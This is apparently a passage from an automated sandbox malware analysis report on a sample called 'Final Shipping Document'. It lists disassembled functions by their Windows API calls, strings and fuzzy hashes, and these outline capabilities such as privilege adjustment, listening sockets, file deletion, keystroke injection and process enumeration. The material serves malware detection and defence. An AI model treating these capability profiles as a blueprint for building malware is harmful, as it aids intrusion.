                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $ $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-3163812486
                                                            • Opcode ID: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                            • Instruction ID: c262a52c2d43bc4bc42ab4f7b63ba2e8442ba4500bd0f2b96c9f6b6112d6dd7f
                                                            • Opcode Fuzzy Hash: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                            • Instruction Fuzzy Hash: 1601D673660211ABEB6426B59CC6BFF725CA714750F194D21FD13F21D1D5A15D40D290
                                                            Function 00C21204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C21276
                                                            • WSAGetLastError.WSOCK32 ref: 00C21283
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C212BA
                                                            • WSAGetLastError.WSOCK32 ref: 00C212C5
                                                            • closesocket.WSOCK32(00000000), ref: 00C212F4
                                                            • listen.WSOCK32(00000000,00000005), ref: 00C21303
                                                            • WSAGetLastError.WSOCK32 ref: 00C2130D
                                                            • closesocket.WSOCK32(00000000), ref: 00C2133C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                            • Instruction ID: 536b84b721ad27afb6754a906927f4b7fba6d45d070044ef0fb0e434ac1d3677
                                                            • Opcode Fuzzy Hash: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                            • Instruction Fuzzy Hash: 71418031A00110DFD710DF24D494B2ABBE6AF56318F188198E8669F6E3C771EE81CBE1
                                                            Function 00BDB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BDB9D4
                                                            • _free.LIBCMT ref: 00BDB9F8
                                                            • _free.LIBCMT ref: 00BDBB7F
                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                            • _free.LIBCMT ref: 00BDBD4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                            • String ID:
                                                            • API String ID: 314583886-0
                                                            • Opcode ID: 491eab281eacad6c0ebf39fcd223cb6bd68e2c13012154d9ada7fa51c55a912b
                                                            • Instruction ID: 1cc9f0df43921ccba9589d5f0ba043ad375cb00469ae1b93c480fb39d9fd963f
                                                            • Opcode Fuzzy Hash: 491eab281eacad6c0ebf39fcd223cb6bd68e2c13012154d9ada7fa51c55a912b
                                                            • Instruction Fuzzy Hash: 0EC11375A04245EFCB249F698851FAEFBE8EF41360F1A41EBE89497352FB308E419750
                                                            Function 00C0D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                              • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C0D420
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D470
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D481
                                                            • FindClose.KERNEL32(00000000), ref: 00C0D498
                                                            • FindClose.KERNEL32(00000000), ref: 00C0D4A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                            • Instruction ID: d026d12556c35a264308cfb25204968efa8b8961bb9e80d884920b7757929493
                                                            • Opcode Fuzzy Hash: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                            • Instruction Fuzzy Hash: 97317A7101C3419BC300EFA4D8919AFB7E8AE92340F444A5DF4E293191EB34AA09DB63
                                                            Function 00BDE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                            • Instruction ID: 8884a215ee60958b4e5e4632c6faf76e1395321a925096e4abbc434c245a4816
                                                            • Opcode Fuzzy Hash: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                            • Instruction Fuzzy Hash: 9CC22771E086298BDB25DE289D807EAB7F5EB48305F1441EBD85EE7340E775AE818F40
                                                            Function 00C1648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C164DC
                                                            • CoInitialize.OLE32(00000000), ref: 00C16639
                                                            • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C16650
                                                            • CoUninitialize.OLE32 ref: 00C168D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                            • Instruction ID: 16ff351823bc8b19979b4bf50c8659a57a2642ab7f2deb26f138635589f7083d
                                                            • Opcode Fuzzy Hash: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                            • Instruction Fuzzy Hash: 13D15971508201AFC314EF24C881EABB7E9FF96704F00496DF5958B291EB71EA49CB92
                                                            Function 00C222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00C222E8
                                                              • Part of subcall function 00C1E4EC: GetWindowRect.USER32(?,?), ref: 00C1E504
                                                            • GetDesktopWindow.USER32 ref: 00C22312
                                                            • GetWindowRect.USER32(00000000), ref: 00C22319
                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C22355
                                                            • GetCursorPos.USER32(?), ref: 00C22381
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C223DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                            • String ID:
                                                            • API String ID: 2387181109-0
                                                            • Opcode ID: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                            • Instruction ID: 2cde447ff8172e4ccfb51f25541d0be105b92defe26ff5ac4c5b29196bc6b696
                                                            • Opcode Fuzzy Hash: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                            • Instruction Fuzzy Hash: 3A31AD72504325ABD720DF55D849B9FBBADFF88314F000A19F995A7191DB34EA08CB92
                                                            Function 00C19B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C19B78
                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C19C8B
                                                              • Part of subcall function 00C13874: GetInputState.USER32 ref: 00C138CB
                                                              • Part of subcall function 00C13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C19BA8
                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C19C75
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                            • String ID: *.*
                                                            • API String ID: 1972594611-438819550
                                                            • Opcode ID: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                            • Instruction ID: 485559d7c1ee7fa79e2b5c560bf51a9c4e1cdbcae70e6b8ec142272f5e4cf491
                                                            • Opcode Fuzzy Hash: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                            • Instruction Fuzzy Hash: 8341717190420A9FCF14DF64C8A5AEEBBF8EF06310F144095E855A2191EB309F95DFA0
                                                            Function 00BB997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BB9A4E
                                                            • GetSysColor.USER32(0000000F), ref: 00BB9B23
                                                            • SetBkColor.GDI32(?,00000000), ref: 00BB9B36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$LongProcWindow
                                                            • String ID:
                                                            • API String ID: 3131106179-0
                                                            • Opcode ID: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                            • Instruction ID: 08d8552b83f8e61b78d8ddf24e6a9fdc02ec759dc16b86ca96e40d021371e809
                                                            • Opcode Fuzzy Hash: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                            • Instruction Fuzzy Hash: 50A1E070258408AFE728AA2D8C99EFF3ADDDB42340F2502C9F702D7691CEA59D45D372
                                                            Function 00C21806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                              • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C2185D
                                                            • WSAGetLastError.WSOCK32 ref: 00C21884
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C218DB
                                                            • WSAGetLastError.WSOCK32 ref: 00C218E6
                                                            • closesocket.WSOCK32(00000000), ref: 00C21915
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 1601658205-0
                                                            • Opcode ID: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
                                                            • Instruction ID: 712dd442b65726a4c945c9e307d6d740e0618342f939140220bda0123638a11c
                                                            • Opcode Fuzzy Hash: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
                                                            • Instruction Fuzzy Hash: B951A271A00210AFDB10AF24D8C6F7A77E5AB45718F188498F919AF3D3C771AE418BA1
                                                            Function 00C31C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: d667df46e637cb186ec914b50dab156a34e09b62efae333e7a2730fcc938a4b6
                                                            • Instruction ID: 10d79cdddc158dba5b9c975eed536a1750d5971dd85e98118e2dc00e6ac93b62
                                                            • Opcode Fuzzy Hash: d667df46e637cb186ec914b50dab156a34e09b62efae333e7a2730fcc938a4b6
                                                            • Instruction Fuzzy Hash: F421E0317602109FD7218F2AE894B6A7BE5EF85324F1C9068EC4ADB351CB71ED42CB90
                                                            Function 00BA8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
                                                            • Instruction ID: 0c89df2cd3f0ddf86cef32e174edf15bc2bbc42347eb5b88d696b2c5b3437c06
                                                            • Opcode Fuzzy Hash: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
                                                            • Instruction Fuzzy Hash: 69A26C70E0465ACBDF24CF59C8807AEB7F1FB55314F2481EAE816A7685EB709D81CB90
                                                            Function 00C2A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C2A6AC
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C2A6BA
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C2A79C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2A7AB
                                                              • Part of subcall function 00BBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BE3303,?), ref: 00BBCE8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                            • String ID:
                                                            • API String ID: 1991900642-0
                                                            • Opcode ID: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
                                                            • Instruction ID: ac7b8419a7969f7121177d5dc921350dff8c6ea5c293e1fcc21d47ae928e4da3
                                                            • Opcode Fuzzy Hash: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
                                                            • Instruction Fuzzy Hash: 0E514DB1508310AFD710EF24D886A6FBBE8FF89754F00896DF59997291EB70D904CB92
                                                            Function 00C0AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C0AAAC
                                                            • SetKeyboardState.USER32(00000080), ref: 00C0AAC8
                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C0AB36
                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C0AB88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
                                                            • Instruction ID: fa06a0c98f7a387f8dbe845c1992b259a44244ed40f6b16a6da25a71f0cad8ae
                                                            • Opcode Fuzzy Hash: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
                                                            • Instruction Fuzzy Hash: 9E312671A44318AFFF35CB69CC05BFE7BAAAB44310F04421AF1A1961D1D374CA81D762
                                                            Function 00C1CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00C1CE89
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C1CEEA
                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00C1CEFE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorEventFileInternetLastRead
                                                            • String ID:
                                                            • API String ID: 234945975-0
                                                            • Opcode ID: 07a871bbe4cc84a7c4c20c0dda3fb8ba2be76bf5a7800e72469a7600c3d54b23
                                                            • Instruction ID: 9ad6af8b2ec6e750906179d109e76193ed34f8cf9f1c5cec5caa798177baaaf1
                                                            • Opcode Fuzzy Hash: 07a871bbe4cc84a7c4c20c0dda3fb8ba2be76bf5a7800e72469a7600c3d54b23
                                                            • Instruction Fuzzy Hash: EC21BD71540305ABDB30CFA5C988BABB7F8EF11314F10442EF566A2151E774EE85AB90
                                                            Function 00C08298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C082AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: 1d5efb23e3ce66718bf6599e1137eda89f7d1b72f259f9a5eb42628f7edcd46f
                                                            • Instruction ID: 90b2ff4b3c162037edc6d9cc102aeb13c5c39479eccdf38abc9db09c3c88d1bb
